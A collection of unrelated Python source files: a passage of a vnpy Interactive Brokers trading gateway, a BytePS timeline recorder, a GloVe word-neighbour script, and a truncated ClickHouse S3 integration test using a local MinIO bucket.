def currentTime(self, time: int) -> None:
"""IB当前服务器时间回报"""
super().currentTime(time)
dt: datetime = datetime.fromtimestamp(time)
time_string: str = dt.strftime("%Y-%m-%d %H:%M:%S.%f")
msg: str = f"服务器时间: {time_string}"
self.gateway.write_log(msg)
def error(self, reqId: TickerId, errorCode: int, errorString: str) -> None:
"""具体错误请求回报"""
super().error(reqId, errorCode, errorString)
if reqId == self.history_reqid:
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
msg: str = f"信息通知,代码:{errorCode},内容: {errorString}"
self.gateway.write_log(msg)
# 行情服务器已连接
if errorCode == 2104 and not self.data_ready:
self.data_ready = True
self.client.reqCurrentTime()
reqs: list = list(self.subscribed.values())
self.subscribed.clear()
for req in reqs:
self.subscribe(req)
def tickPrice(
self, reqId: TickerId, tickType: TickType, price: float, attrib: TickAttrib
) -> None:
"""tick价格更新回报"""
super().tickPrice(reqId, tickType, price, attrib)
if tickType not in TICKFIELD_IB2VT:
return
tick: TickData = self.ticks[reqId]
name: str = TICKFIELD_IB2VT[tickType]
setattr(tick, name, price)
# 更新tick数据name字段
contract: ContractData = self.contracts.get(tick.vt_symbol, None)
if contract:
tick.name = contract.name
# 本地计算Forex of IDEALPRO和Spot Commodity的tick时间和最新价格
exchange: Exchange = self.tick_exchange[reqId]
if exchange is Exchange.IDEALPRO or "CMDTY" in tick.symbol:
if not tick.bid_price_1 or not tick.ask_price_1:
return
tick.last_price = (tick.bid_price_1 + tick.ask_price_1) / 2
tick.datetime = datetime.now(self.local_tz)
self.gateway.on_tick(copy(tick))
def tickSize(
self, reqId: TickerId, tickType: TickType, size: int
) -> None:
"""tick数量更新回报"""
super().tickSize(reqId, tickType, size)
if tickType not in TICKFIELD_IB2VT:
return
tick: TickData = self.ticks[reqId]
name: str = TICKFIELD_IB2VT[tickType]
setattr(tick, name, size)
self.gateway.on_tick(copy(tick))
def tickString(
self, reqId: TickerId, tickType: TickType, value: str
) -> None:
"""tick字符串更新回报"""
super().tickString(reqId, tickType, value)
if tickType != TickTypeEnum.LAST_TIMESTAMP:
return
tick: TickData = self.ticks[reqId]
dt: datetime = datetime.fromtimestamp(int(value))
tick.datetime = self.local_tz.localize(dt)
self.gateway.on_tick(copy(tick))
def orderStatus(
self,
orderId: OrderId,
status: str,
filled: float,
remaining: float,
avgFillPrice: float,
permId: int,
parentId: int,
lastFillPrice: float,
clientId: int,
whyHeld: str,
mktCapPrice: float,
) -> None:
"""订单状态更新回报"""
super().orderStatus(
orderId,
status,
filled,
remaining,
avgFillPrice,
permId,
parentId,
lastFillPrice,
clientId,
whyHeld,
mktCapPrice,
)
orderid: str = str(orderId)
order: OrderData = self.orders.get(orderid, None)
if not order:
return
order.traded = filled
# 过滤撤单中止状态
order_status: Status = STATUS_IB2VT.get(status, None)
if order_status:
order.status = order_status
self.gateway.on_order(copy(order))
def openOrder(
self,
orderId: OrderId,
ib_contract: Contract,
ib_order: Order,
orderState: OrderState,
) -> None:
"""新订单回报"""
super().openOrder(
orderId, ib_contract, ib_order, orderState
)
orderid: str = str(orderId)
order: OrderData = OrderData(
symbol=generate_symbol(ib_contract),
exchange=EXCHANGE_IB2VT.get(ib_contract.exchange, Exchange.SMART),
type=ORDERTYPE_IB2VT[ib_order.orderType],
orderid=orderid,
direction=DIRECTION_IB2VT[ib_order.action],
volume=ib_order.totalQuantity,
gateway_name=self.gateway_name,
)
if order.type == OrderType.LIMIT:
order.price = ib_order.lmtPrice
elif order.type == OrderType.STOP:
order.price = ib_order.auxPrice
self.orders[orderid] = order
self.gateway.on_order(copy(order))
def updateAccountValue(
self, key: str, val: str, currency: str, accountName: str
) -> None:
"""账号更新回报"""
super().updateAccountValue(key, val, currency, accountName)
if not currency or key not in ACCOUNTFIELD_IB2VT:
return
accountid: str = f"{accountName}.{currency}"
account: AccountData = self.accounts.get(accountid, None)
if not account:
account: AccountData = AccountData(
accountid=accountid,
gateway_name=self.gateway_name
)
self.accounts[accountid] = account
name: str = ACCOUNTFIELD_IB2VT[key]
setattr(account, name, float(val))
def updatePortfolio(
self,
contract: Contract,
position: float,
marketPrice: float,
marketValue: float,
averageCost: float,
unrealizedPNL: float,
realizedPNL: float,
accountName: str,
) -> None:
"""持仓更新回报"""
super().updatePortfolio(
contract,
position,
marketPrice,
marketValue,
averageCost,
unrealizedPNL,
realizedPNL,
accountName,
)
if contract.exchange:
exchange: Exchange = EXCHANGE_IB2VT.get(contract.exchange, None)
elif contract.primaryExchange:
exchange: Exchange = EXCHANGE_IB2VT.get(contract.primaryExchange, None)
else:
exchange: Exchange = Exchange.SMART # Use smart routing for default
if not exchange:
msg: str = f"存在不支持的交易所持仓{generate_symbol(contract)} {contract.exchange} {contract.primaryExchange}"
self.gateway.write_log(msg)
return
try:
ib_size: int = int(contract.multiplier)
except ValueError:
ib_size = 1
price = averageCost / ib_size
pos: PositionData = PositionData(
symbol=generate_symbol(contract),
exchange=exchange,
direction=Direction.NET,
volume=position,
price=price,
pnl=unrealizedPNL,
gateway_name=self.gateway_name,
)
self.gateway.on_position(pos)
def updateAccountTime(self, timeStamp: str) -> None:
"""账号更新时间回报"""
super().updateAccountTime(timeStamp)
for account in self.accounts.values():
self.gateway.on_account(copy(account))
def contractDetails(self, reqId: int, contractDetails: ContractDetails) -> None:
"""合约数据更新回报"""
super().contractDetails(reqId, contractDetails)
# 从IB合约生成vnpy代码
ib_contract: Contract = contractDetails.contract
if not ib_contract.multiplier:
ib_contract.multiplier = 1
symbol: str = generate_symbol(ib_contract)
# 生成合约
contract: ContractData = ContractData(
symbol=symbol,
exchange=EXCHANGE_IB2VT[ib_contract.exchange],
name=contractDetails.longName,
product=PRODUCT_IB2VT[ib_contract.secType],
size=int(ib_contract.multiplier),
pricetick=contractDetails.minTick,
net_position=True,
history_data=True,
stop_supported=True,
gateway_name=self.gateway_name,
)
if contract.vt_symbol not in self.contracts:
self.gateway.on_contract(contract)
self.contracts[contract.vt_symbol] = contract
self.save_contract_data()
def execDetails(
self, reqId: int, contract: Contract, execution: Execution
) -> None:
"""交易数据更新回报"""
super().execDetails(reqId, contract, execution)
dt: datetime = datetime.strptime(execution.time, "%Y%m%d %H:%M:%S")
dt: datetime = self.local_tz.localize(dt)
trade: TradeData = TradeData(
symbol=generate_symbol(contract),
exchange=EXCHANGE_IB2VT.get(contract.exchange, Exchange.SMART),
orderid=str(execution.orderId),
tradeid=str(execution.execId),
direction=DIRECTION_IB2VT[execution.side],
price=execution.price,
volume=execution.shares,
datetime=dt,
gateway_name=self.gateway_name,
)
self.gateway.on_trade(trade)
def managedAccounts(self, accountsList: str) -> None:
"""所有子账户回报"""
super().managedAccounts(accountsList)
if not self.account:
for account_code in accountsList.split(","):
self.account = account_code
self.gateway.write_log(f"当前使用的交易账号为{self.account}")
self.client.reqAccountUpdates(True, self.account)
def historicalData(self, reqId: int, ib_bar: IbBarData) -> None:
"""历史数据更新回报"""
# 日级别数据和周级别日期数据的数据形式为%Y%m%d
if len(ib_bar.date) > 8:
dt: datetime = datetime.strptime(ib_bar.date, "%Y%m%d %H:%M:%S")
else:
dt: datetime = datetime.strptime(ib_bar.date, "%Y%m%d")
dt: datetime = self.local_tz.localize(dt)
bar: BarData = BarData(
symbol=self.history_req.symbol,
exchange=self.history_req.exchange,
datetime=dt,
interval=self.history_req.interval,
volume=ib_bar.volume,
open_price=ib_bar.open,
high_price=ib_bar.high,
low_price=ib_bar.low,
close_price=ib_bar.close,
gateway_name=self.gateway_name
)
self.history_buf.append(bar)
def historicalDataEnd(self, reqId: int, start: str, end: str) -> None:
"""历史数据查询完毕回报"""
self.history_condition.acquire()
self.history_condition.notify()
self.history_condition.release()
def connect(self, host: str, port: int, clientid: int, account: str) -> None:
"""连接TWS"""
if self.status:
return
self.host = host
self.port = port
self.clientid = clientid
self.account = account
self.client.connect(host, port, clientid)
self.thread = Thread(target=self.client.run)
self.thread.start()
def check_connection(self) -> None:
"""检查连接"""
if self.client.isConnected():
return
if self.status:
self.close()
self.client.connect(self.host, self.port, self.clientid)
self.thread = Thread(target=self.client.run)
self.thread.start()
def close(self) -> None:
"""断开TWS连接"""
if not self.status:
return
self.status = False
self.client.disconnect()
def subscribe(self, req: SubscribeRequest) -> None:
"""订阅tick数据更新"""
if not self.status:
return
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所{req.exchange}")
return
# 过滤重复订阅
if req.vt_symbol in self.subscribed:
return
self.subscribed[req.vt_symbol] = req
# 解析IB合约详情
ib_contract: Contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
self.gateway.write_log("代码解析失败,请检查格式是否正确")
return
# 通过TWS查询合约信息
self.reqid += 1
self.client.reqContractDetails(self.reqid, ib_contract)
# 订阅tick数据并创建tick对象缓冲区
self.reqid += 1
self.client.reqMktData(self.reqid, ib_contract, "", False, False, [])
tick: TickData = TickData(
symbol=req.symbol,
exchange=req.exchange,
datetime=datetime.now(self.local_tz),
gateway_name=self.gateway_name,
)
self.ticks[self.reqid] = tick
self.tick_exchange[self.reqid] = req.exchange
def send_order(self, req: OrderRequest) -> str:
"""委托下单"""
if not self.status:
return ""
if req.exchange not in EXCHANGE_VT2IB:
self.gateway.write_log(f"不支持的交易所:{req.exchange}")
return ""
if req.type not in ORDERTYPE_VT2IB:
self.gateway.write_log(f"不支持的价格类型:{req.type}")
return ""
self.orderid += 1
ib_contract: Contract = generate_ib_contract(req.symbol, req.exchange)
if not ib_contract:
return ""
ib_order: Order = Order()
ib_order.orderId = self.orderid
ib_order.clientId = self.clientid
ib_order.action = DIRECTION_VT2IB[req.direction]
ib_order.orderType = ORDERTYPE_VT2IB[req.type]
ib_order.totalQuantity = req.volume
ib_order.account = self.account
if req.type == OrderType.LIMIT:
ib_order.lmtPrice = req.price
elif req.type == OrderType.STOP:
ib_order.auxPrice = req.price
self.client.placeOrder(self.orderid, ib_contract, ib_order)
self.client.reqIds(1)
order: OrderData = req.create_order_data(str(self.orderid), self.gateway_name)
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, req: CancelRequest) -> None:
"""委托撤单"""
if not self.status:
return
self.client.cancelOrder(int(req.orderid))
def query_history(self, req: HistoryRequest) -> List[BarData]:
"""查询历史数据"""
self.history_req = req
self.reqid += 1
ib_contract: Contract = generate_ib_contract(req.symbol, req.exchange)
if req.end:
end: datetime = req.end
end_str: str = end.strftime("%Y%m%d %H:%M:%S")
else:
end: datetime = datetime.now(self.local_tz)
end_str: str = ""
delta: timedelta = end - req.start
days: int = min(delta.days, 180) # IB 只提供6个月数据
duration: str = f"{days} D"
bar_size: str = INTERVAL_VT2IB[req.interval]
if req.exchange == Exchange.IDEALPRO:
bar_type: str = "MIDPOINT"
else:
bar_type: str = "TRADES"
self.history_reqid = self.reqid
self.client.reqHistoricalData(
self.reqid,
ib_contract,
end_str,
duration,
bar_size,
bar_type,
0,
1,
False,
[]
)
self.history_condition.acquire() # 等待异步数据返回
self.history_condition.wait()
self.history_condition.release()
history: List[BarData] = self.history_buf
self.history_buf: List[BarData] = [] # 创新新的缓冲列表
self.history_req: HistoryRequest = None
return history
def load_contract_data(self) -> None:
"""加载本地合约数据"""
f = shelve.open(self.data_filepath)
self.contracts = f.get("contracts", {})
f.close()
for contract in self.contracts.values():
self.gateway.on_contract(contract)
self.gateway.write_log("本地缓存合约信息加载成功")
def save_contract_data(self) -> None:
"""保存合约数据至本地"""
f = shelve.open(self.data_filepath)
f["contracts"] = self.contracts
f.close()
def generate_ib_contract(symbol: str, exchange: Exchange) -> Optional[Contract]:
"""生产IB合约"""
try:
fields: list = symbol.split(JOIN_SYMBOL)
ib_contract: Contract = Contract()
ib_contract.exchange = EXCHANGE_VT2IB[exchange]
ib_contract.secType = fields[-1]
ib_contract.currency = fields[-2]
ib_contract.symbol = fields[0]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
ib_contract.lastTradeDateOrContractMonth = fields[1]
if ib_contract.secType == "FUT":
if len(fields) == 5:
ib_contract.multiplier = int(fields[2])
if ib_contract.secType in ["OPT", "FOP"]:
ib_contract.right = fields[2]
ib_contract.strike = float(fields[3])
ib_contract.multiplier = int(fields[4])
except IndexError:
ib_contract = None
return ib_contract
def generate_symbol(ib_contract: Contract) -> str:
"""生成vnpy代码"""
fields: list = [ib_contract.symbol]
if ib_contract.secType in ["FUT", "OPT", "FOP"]:
fields.append(ib_contract.lastTradeDateOrContractMonth)
if ib_contract.secType in ["OPT", "FOP"]:
fields.append(ib_contract.right)
fields.append(str(ib_contract.strike))
fields.append(str(ib_contract.multiplier))
fields.append(ib_contract.currency)
fields.append(ib_contract.secType)
symbol: str = JOIN_SYMBOL.join(fields)
return symbol
|
dataloader.py
|
import os
import time
import json
import threading
from horovod.mxnet.mpi_ops import local_rank
class TimtLineRecorder(object):
def __init__(self, _trace_name, _name):
if os.environ.get("BYTEPS_TRACE_ON", "") == "1":
self._end_trace = True
self._end_trace = False
self.trace_dir = os.path.join(os.environ.get("BYTEPS_TRACE_DIR", "."), str(local_rank()))
if not os.path.exists(self.trace_dir):
os.makedirs(self.trace_dir)
self.trace_path = os.path.join(self.trace_dir, _trace_name)
self.ts = []
self.dur = []
self._name = _name
def start(self):
if self._end_trace:
return
if os.environ.get("BYTEPS_TRACE_STATUS", "") == "END":
self._end_trace = True
self.output_traces()
return
self.ts.append(time.time() * 1000000.0)
def end(self):
if self._end_trace:
return
assert len(self.ts) == len(self.dur) + 1 or len(self.ts) == len(self.dur)
if len(self.ts) == len(self.dur) + 1:
self.dur.append(time.time() * 1000000.0 - self.ts[-1])
def output_traces(self):
def _output(self):
rst_traces = {"traceEvents": []}
for i in range(len(self.dur)):
_ts, _dur = self.ts[i], self.dur[i]
_event = {
"name": self._name,
"ts": _ts,
"dur": _dur,
"ph": "X",
"cat": self._name,
"pid": self._name,
"args": {
"name":self._name
}
}
rst_traces["traceEvents"].append(_event)
rst_traces["displayTimeUnit"] = "ms"
with open(self.trace_path, 'w') as f:
json.dump(rst_traces, f, indent=4)
self.ts = []
self.dur = []
t = threading.Thread(target=_output, args=(self,))
t.start()
########################################################
# Used to wrap IO iterator
########################################################
class HVDMultiWorkerIter(object):
def __init__(self, data_iter):
self._data_iter = data_iter
self.recorder = TimtLineRecorder('io.json', 'I/O')
def _push_next_dataset(self):
self._data_iter._push_next_dataset()
def _push_next(self):
self._data_iter._push_next()
def _next_dataset(self):
return self._data_iter._next_dataset()
def __next__(self):
self.recorder.start()
ret = self._data_iter.__next__()
self.recorder.end()
return ret
def next(self):
return self.__next__()
def __iter__(self):
return self
def __len__(self):
return self._data_iter.__len__()
class HVDDatasetLoader(object):
def __init__(self, dataloader):
self._dataloader = dataloader
def __iter__(self):
return HVDMultiWorkerIter(self._dataloader.__iter__())
def __len__(self):
return self._dataloader.__len__()
########################################################
# Trainer, used to wrap the process
# of updating local model
########################################################
class HVDTrainer(object):
def __init__(self, _trainer):
self._trainer = _trainer
self.recorder = TimtLineRecorder('step.json', 'STEP')
def backward(self, *args, **kwargs):
self._trainer.backward(*args, **kwargs)
def step(self, *args, **kwargs):
self.recorder.start()
self._trainer.step(*args, **kwargs)
self.recorder.end()
|
neighbors.py
|
"""Author: Brandon Trabucco
Calculate the closest neighbors of each word in embedding space.
"""
import numpy as np
import os.path
import collections
import nltk
import threading
import glove
def word_neighbors(vocab, embeddings, words, k=5):
"""Compute the k closest neighbors to the word ids in embedding space.
Args:
vocab: The vocabulary object.
embeddings: The emebedding matrix.
words: List of words to evaluate.
Returns:
outputs: The k closest words to words
"""
output_ids, output_distances = compute_neighbors(
embeddings, [vocab.word_to_id(str(w).strip().lower()) for w in words], k=k)
return [[vocab.id_to_word(idx) for idx in x] for x in output_ids]
def compute_neighbors(embeddings, word_ids, k=5):
"""Compute the k closest neighbors to the word ids in embedding space.
Args:
embeddings: The emebedding matrix.
word_ids: The word ids to evaluate the neighbors of.
Returns:
output_ids: The k closest words to word_ids
output_distances: Distances corresponding to output_ids.
"""
output_ids = []
output_distances = []
for idx in word_ids:
embedded = embeddings[idx:(idx + 1), :]
distances = np.linalg.norm(embeddings - embedded, axis=1)
closest = np.argsort(distances)[:k]
distances = distances[closest]
output_ids.append(closest)
output_distances.append(distances)
return output_ids, output_distances
def _compute_neighbors(thread_index, ranges, embeddings,
neighbor_ids, neighbor_distances):
"""Computes the k closest words to a set fo words in embedding space.
Args:
thread_index: int
ranges: Bounds of word ids to compute
embeddings: The emebedding matrix
neighbors_ids: The word ids of the k closest neighbors.
neighbors_distances: The distances corresponding to neighbors_ids
"""
length = ranges[thread_index][1] - ranges[thread_index][0]
print("Starting thread %d with %d words." % (thread_index, length))
for idx in range(*ranges[thread_index]):
embedded = embeddings[idx:(idx + 1), :]
distances = np.linalg.norm(embeddings - embedded, axis=1)
closest = np.argsort(distances)[:neighbor_ids.shape[1]]
distances = distances[closest]
neighbor_ids[idx, :] = closest
neighbor_distances[idx, :] = distances
if (idx - ranges[thread_index][0]) % max(1, length // 10) == 0:
print("Thread %d processed %d words of %d." % (
thread_index, idx - ranges[thread_index][0], length))
print("Thread %d has finished." % thread_index)
def dump(config):
"""Loads word embeddngs an calculates neighbors.
Args:
config: an instance of NeighborConfiguration
"""
vocab, embeddings = glove.load(config)
num_threads = min(config.length, config.distances_threads)
spacing = np.linspace(0, config.length, num_threads + 1).astype(np.int)
ranges = []
threads = []
for i in range(len(spacing) - 1):
ranges.append([spacing[i], spacing[i + 1]])
neighbor_ids = np.zeros([config.length, config.radius]).astype(np.int)
neighbor_distances = np.zeros([config.length, config.radius])
print("Launching %d threads for calculating neighbors." % (num_threads + 1))
for thread_index in range(len(ranges)):
args = (thread_index, ranges, embeddings, neighbor_ids, neighbor_distances)
t = threading.Thread(target=_compute_neighbors, args=args)
t.start()
threads.append(t)
for t in threads:
t.join()
ids_name = os.path.join(config.distances_dir, "neighbor.%s.%s.%s.ids.txt" % (
str(config.embedding) + "d", str(config.length) + "w", str(config.radius) + "k"))
distances_name = os.path.join(config.distances_dir, "neighbor.%s.%s.%s.distances.txt" % (
str(config.embedding) + "d", str(config.length) + "w", str(config.radius) + "k"))
np.savetxt(ids_name, neighbor_ids)
np.savetxt(distances_name, neighbor_distances)
print("Finished saving %s and %s." % (ids_name, distances_name))
def dump_default():
"""Loads the default word embeddings to compute neighbors of words.
"""
config = glove.configuration.NeighborConfiguration(
embedding=50,
filedir="./embeddings/",
length=12000,
start_word="<S>",
end_word="</S>",
unk_word="<UNK>",
radius=20,
distances_dir="./distances/",
distances_threads=7)
return dump(config)
|
test.py
|
import gzip
import json
import logging
import os
import io
import random
import threading
import time
import helpers.client
import pytest
from helpers.cluster import ClickHouseCluster, ClickHouseInstance
MINIO_INTERNAL_PORT = 9001
SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__))
CONFIG_PATH = os.path.join(SCRIPT_DIR, './_instances/dummy/configs/config.d/defaultS3.xml')
# Creates S3 bucket for tests and allows anonymous read-write access to it.
def prepare_s3_bucket(started_cluster):
# Allows read-write access for bucket without authorization.
bucket_read_write_policy = {"Version": "2012-10-17",
"Statement": [
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetBucketLocation",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::root"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::root/*"
},
{
"Sid": "",
"Effect": "Allow",
"Principal": {"AWS": "*"},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::root/*"
}
]}
minio_client = started_cluster.minio_client
minio_client.set_bucket_policy(started_cluster.minio_bucket, json.dumps(bucket_read_write_policy))
started_cluster.minio_restricted_bucket = "{}-with-auth".format(started_cluster.minio_bucket)
if minio_client.bucket_exists(started_cluster.minio_restricted_bucket):
minio_client.remove_bucket(started_cluster.minio_restricted_bucket)
minio_client.make_bucket(started_cluster.minio_restricted_bucket)
def put_s3_file_content(started_cluster, bucket, filename, data):
buf = io.BytesIO(data)
started_cluster.minio_client.put_object(bucket, filename, buf, len(data))
# Returns content of given S3 file as string.
def get_s3_file_content(started_cluster, bucket, filename, decode=True):
# type: (ClickHouseCluster, str, str, bool) -> str
data = started_cluster.minio_client.get_object(bucket, filename)
data_str = b""
for chunk in data.stream():
data_str += chunk
if decode:
return data_str.decode()
return data_str
@pytest.fixture(scope="module")
def started_cluster():
try:
cluster = ClickHouseCluster(__file__)
cluster.add_instance("restricted_dummy", main_configs=["configs/config_for_test_remote_host_filter.xml"],
with_minio=True)
cluster.add_instance("dummy", with_minio=True, main_configs=["configs/defaultS3.xml"])
cluster.add_instance("s3_max_redirects", with_minio=True, main_configs=["configs/defaultS3.xml"],
user_configs=["configs/s3_max_redirects.xml"])
logging.info("Starting cluster...")
cluster.start()
logging.info("Cluster started")
prepare_s3_bucket(cluster)
logging.info("S3 bucket created")
run_s3_mocks(cluster)
yield cluster
finally:
cluster.shutdown()
def run_query(instance, query, stdin=None, settings=None):
# type: (ClickHouseInstance, str, object, dict) -> str
logging.info("Running query '{}'...".format(query))
result = instance.query(query, stdin=stdin, settings=settings)
logging.info("Query finished")
return result
# Test simple put. Also checks that wrong credentials produce an error with every compression method.
@pytest.mark.parametrize("maybe_auth,positive,compression", [
pytest.param("", True, 'auto', id="positive"),
pytest.param("'minio','minio123',", True, 'auto', id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, 'auto', id="auto"),
pytest.param("'wrongid','wrongkey',", False, 'gzip', id="gzip"),
pytest.param("'wrongid','wrongkey',", False, 'deflate', id="deflate"),
pytest.param("'wrongid','wrongkey',", False, 'brotli', id="brotli"),
pytest.param("'wrongid','wrongkey',", False, 'xz', id="xz"),
pytest.param("'wrongid','wrongkey',", False, 'zstd', id="zstd")
])
def test_put(started_cluster, maybe_auth, positive, compression):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 2, 3), (3, 2, 1), (78, 43, 45)"
values_csv = "1,2,3\n3,2,1\n78,43,45\n"
filename = "test.csv"
put_query = f"""insert into table function s3('http://{started_cluster.minio_ip}:{started_cluster.minio_port}/{bucket}/{filename}',
{maybe_auth}'CSV', '{table_format}', {compression}) values {values}"""
try:
run_query(instance, put_query)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
@pytest.mark.parametrize("special", [
"space",
"plus"
])
def test_get_file_with_special(started_cluster, special):
symbol = {"space": " ", "plus": "+"}[special]
urlsafe_symbol = {"space": "%20", "plus": "%2B"}[special]
auth = "'minio','minio123',"
bucket = started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = [[12549, 2463, 19893], [64021, 38652, 66703], [81611, 39650, 83516], [11079, 59507, 61546], [51764, 69952, 6876], [41165, 90293, 29095], [40167, 78432, 48309], [81629, 81327, 11855], [55852, 21643, 98507], [6738, 54643, 41155]]
values_csv = ('\n'.join((','.join(map(str, row)) for row in values)) + '\n').encode()
filename = f"get_file_with_{special}_{symbol}two.csv"
put_s3_file_content(started_cluster, bucket, filename, values_csv)
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}two.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
get_query = f"SELECT * FROM s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/get_file_with_{special}_{urlsafe_symbol}*.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert [list(map(int, l.split())) for l in run_query(instance, get_query).splitlines()] == values
@pytest.mark.parametrize("special", [
"space",
"plus",
"plus2"
])
def test_get_path_with_special(started_cluster, special):
symbol = {"space": "%20", "plus": "%2B", "plus2": "%2B"}[special]
safe_symbol = {"space": "%20", "plus": "+", "plus2": "%2B"}[special]
auth = "'minio','minio123',"
table_format = "column1 String"
instance = started_cluster.instances["dummy"]
get_query = f"SELECT * FROM s3('http://resolver:8082/get-my-path/{safe_symbol}.csv', {auth}'CSV', '{table_format}') FORMAT TSV"
assert run_query(instance, get_query).splitlines() == [f"/{symbol}.csv"]
# Test put no data to S3.
@pytest.mark.parametrize("auth", [
pytest.param("'minio','minio123',", id="minio")
])
def test_empty_put(started_cluster, auth):
# type: (ClickHouseCluster, str) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
create_empty_table_query = """
CREATE TABLE empty_table (
{}
) ENGINE = Null()
""".format(table_format)
run_query(instance, create_empty_table_query)
filename = "empty_put_test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') select * from empty_table".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format)
run_query(instance, put_query)
try:
run_query(instance, "select count(*) from s3('http://{}:{}/{}/{}', {}'CSV', '{}')".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, auth, table_format))
assert False, "Query should be failed."
except helpers.client.QueryRuntimeException as e:
assert str(e).find("The specified key does not exist") != 0
# Test put values in CSV format.
@pytest.mark.parametrize("maybe_auth,positive", [
pytest.param("", True, id="positive"),
pytest.param("'minio','minio123',", True, id="auth_positive"),
pytest.param("'wrongid','wrongkey',", False, id="negative"),
])
def test_put_csv(started_cluster, maybe_auth, positive):
# type: (ClickHouseCluster, bool, str) -> None
bucket = started_cluster.minio_bucket if not maybe_auth else started_cluster.minio_restricted_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
put_query = "insert into table function s3('http://{}:{}/{}/{}', {}'CSV', '{}') format CSV".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, maybe_auth, table_format)
csv_data = "8,9,16\n11,18,13\n22,14,2\n"
try:
run_query(instance, put_query, stdin=csv_data)
except helpers.client.QueryRuntimeException:
if positive:
raise
else:
assert positive
assert csv_data == get_s3_file_content(started_cluster, bucket, filename)
# Test put and get with S3 server redirect.
def test_put_get_with_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
values_csv = "1,1,1\n1,1,1\n11,11,11\n"
filename = "test.csv"
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
run_query(instance, query)
assert values_csv == get_s3_file_content(started_cluster, bucket, filename)
query = "select *, column1*column2*column3 from s3('http://{}:{}/{}/{}', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format)
stdout = run_query(instance, query)
assert list(map(str.split, stdout.splitlines())) == [
["1", "1", "1", "1"],
["1", "1", "1", "1"],
["11", "11", "11", "1331"],
]
# Test put with restricted S3 server redirect.
def test_put_with_zero_redirect(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["s3_max_redirects"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
values = "(1, 1, 1), (1, 1, 1), (11, 11, 11)"
filename = "test.csv"
# Should work without redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename, table_format, values)
run_query(instance, query)
# Should not work with redirect
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, filename, table_format, values)
exception_raised = False
try:
run_query(instance, query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
def test_put_get_with_globs(started_cluster):
# type: (ClickHouseCluster) -> None
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
max_path = ""
for i in range(10):
for j in range(10):
path = "{}_{}/{}.csv".format(i, random.choice(['a', 'b', 'c', 'd']), j)
max_path = max(path, max_path)
values = "({},{},{})".format(i, j, i + j)
query = "insert into table function s3('http://{}:{}/{}/{}', 'CSV', '{}') values {}".format(
started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, path, table_format, values)
run_query(instance, query)
query = "select sum(column1), sum(column2), sum(column3), min(_file), max(_path) from s3('http://{}:{}/{}/*_{{a,b,c,d}}/%3f.csv', 'CSV', '{}')".format(
started_cluster.minio_redirect_host, started_cluster.minio_redirect_port, bucket, table_format)
assert run_query(instance, query).splitlines() == [
"450\t450\t900\t0.csv\t{bucket}/{max_path}".format(bucket=bucket, max_path=max_path)]
# Test multipart put.
@pytest.mark.parametrize("maybe_auth,positive", [
